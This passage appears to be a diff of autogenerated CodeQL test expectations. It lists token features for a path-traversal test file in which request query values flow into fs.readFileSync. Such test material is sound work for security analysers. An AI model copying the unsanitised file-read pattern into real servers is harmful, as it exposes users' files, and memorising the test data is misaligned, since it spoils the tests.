enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:24:6:24:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:24:6:24:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:24:19:24:22 | './' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:24:19:24:22 | './' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:24:19:24:22 | './' | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:24:19:24:22 | './' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:24:19:24:22 | './' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:24:19:24:22 | './' | stringConcatenatedWith | -endpoint- path | | autogenerated/TaintedPath/normalizedPaths.js:24:19:24:29 | './' + path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:24:19:24:29 | './' + path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:24:19:24:29 | './' + path | calleeImports | fs | @@ -7565,6 +70003,43 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:24:19:24:29 | './' + path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:24:19:24:29 | './' + path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:24:19:24:29 | './' + path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:24:26:24:29 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:24:26:24:29 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:24:26:24:29 | path | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:24:26:24:29 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:24:26:24:29 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:24:26:24:29 | path | stringConcatenatedWith | './' -endpoint- | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:4 | fs | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:39 | exceptional return of fs.read ... .html') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:39 | exceptional return of fs.read ... .html') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:39 | exceptional return of fs.read ... .html') | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:39 | exceptional return of fs.read ... .html') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:39 | exceptional return of fs.read ... .html') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:39 | fs.read ... .html') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:39 | fs.read ... .html') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:39 | fs.read ... .html') | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:39 | fs.read ... .html') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:25:3:25:39 | fs.read ... .html') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:25:6:25:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:25:6:25:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:25:6:25:17 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:25:6:25:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:25:6:25:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:25:19:25:22 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:25:19:25:22 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:25:19:25:22 | path | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:25:19:25:22 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:25:19:25:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:25:19:25:22 | path | stringConcatenatedWith | -endpoint- '/index.html' | | autogenerated/TaintedPath/normalizedPaths.js:25:19:25:38 | path + '/index.html' | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:25:19:25:38 | path + '/index.html' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:25:19:25:38 | path + '/index.html' | calleeImports | fs | @@ -7574,6 +70049,52 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:25:19:25:38 | path + '/index.html' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:25:19:25:38 | path + '/index.html' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:25:19:25:38 | path + '/index.html' | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:25:26:25:38 | '/index.html' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:25:26:25:38 | '/index.html' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:25:26:25:38 | '/index.html' | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:25:26:25:38 | '/index.html' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:25:26:25:38 | '/index.html' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:25:26:25:38 | '/index.html' | stringConcatenatedWith | path -endpoint- | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:4 | fs | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:54 | exceptional return of fs.read ... html')) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:54 | exceptional return of fs.read ... html')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:54 | exceptional return of fs.read ... html')) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:54 | exceptional return of fs.read ... html')) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:54 | exceptional return of fs.read ... html')) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:54 | fs.read ... html')) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:54 | fs.read ... html')) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:54 | fs.read ... html')) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:54 | fs.read ... html')) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:26:3:26:54 | fs.read ... html')) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:26:6:26:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:26:6:26:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:26:6:26:17 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:26:6:26:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:26:6:26:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:28 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:28 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:28 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:28 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:28 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:33 | pathModule.join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:33 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:33 | pathModule.join | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:33 | pathModule.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:33 | pathModule.join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:53 | exceptional return of pathMod ... .html') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:53 | exceptional return of pathMod ... .html') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:53 | exceptional return of pathMod ... .html') | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:53 | exceptional return of pathMod ... .html') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:26:19:26:53 | exceptional return of pathMod ... .html') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:26:19:26:53 | pathMod ... .html') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:26:19:26:53 | pathMod ... .html') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:26:19:26:53 | pathMod ... .html') | calleeImports | fs | @@ -7583,6 +70104,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:26:19:26:53 | pathMod ... .html') | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:26:19:26:53 | pathMod ... .html') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:26:19:26:53 | pathMod ... .html') | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:26:30:26:33 | join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:26:30:26:33 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:26:30:26:33 | join | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:26:30:26:33 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:26:30:26:33 | join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:26:35:26:38 | path | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:26:35:26:38 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:26:35:26:38 | path | calleeImports | path | @@ -7601,6 +70127,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:26:41:26:52 | 'index.html' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:26:41:26:52 | 'index.html' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:26:41:26:52 | 'index.html' | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:4 | fs | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:58 | exceptional return of fs.read ... path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:58 | exceptional return of fs.read ... path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:58 | exceptional return of fs.read ... path)) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:58 | exceptional return of fs.read ... path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:58 | exceptional return of fs.read ... path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:58 | fs.read ... path)) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:58 | fs.read ... path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:58 | fs.read ... path)) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:58 | fs.read ... path)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:27:3:27:58 | fs.read ... path)) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:27:6:27:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:27:6:27:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:27:6:27:17 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:27:6:27:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:27:6:27:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:28 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:28 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:28 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:28 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:28 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:33 | pathModule.join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:33 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:33 | pathModule.join | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:33 | pathModule.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:33 | pathModule.join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:57 | exceptional return of pathMod ... , path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:57 | exceptional return of pathMod ... , path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:57 | exceptional return of pathMod ... , path) | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:57 | exceptional return of pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:27:19:27:57 | exceptional return of pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:27:19:27:57 | pathMod ... , path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:27:19:27:57 | pathMod ... , path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:27:19:27:57 | pathMod ... , path) | calleeImports | fs | @@ -7610,6 +70176,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:27:19:27:57 | pathMod ... , path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:27:19:27:57 | pathMod ... , path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:27:19:27:57 | pathMod ... , path) | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:27:30:27:33 | join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:27:30:27:33 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:27:30:27:33 | join | enclosingFunctionBody | req res path pathModule normalize req query path fs readFileSync path fs readFileSync ./ path fs readFileSync path /index.html fs readFileSync pathModule join path index.html fs readFileSync pathModule join /home/user/www path | +| autogenerated/TaintedPath/normalizedPaths.js:27:30:27:33 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:27:30:27:33 | join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:27:35:27:50 | '/home/user/www' | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:27:35:27:50 | '/home/user/www' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:27:35:27:50 | '/home/user/www' | calleeImports | path | @@ -7628,6 +70199,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:27:53:27:56 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:27:53:27:56 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:27:53:27:56 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:30:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:30:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:30:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:30:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:30:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:30:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:51:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:51:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:51:2 | app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:51:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:51:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:30:1:51:2 | exceptional return of app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:30:5:30:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:5:30:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:30:5:30:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:30:9:30:32 | '/norma ... solute' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:30:9:30:32 | '/norma ... solute' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:30:9:30:32 | '/norma ... solute' | calleeImports | express | @@ -7635,6 +70221,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:30:9:30:32 | '/norma ... solute' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:30:9:30:32 | '/norma ... solute' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:30:9:30:32 | '/norma ... solute' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:30:34 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:30:35:30:34 | fs | contextSurroundingFunctionParameters | | +| 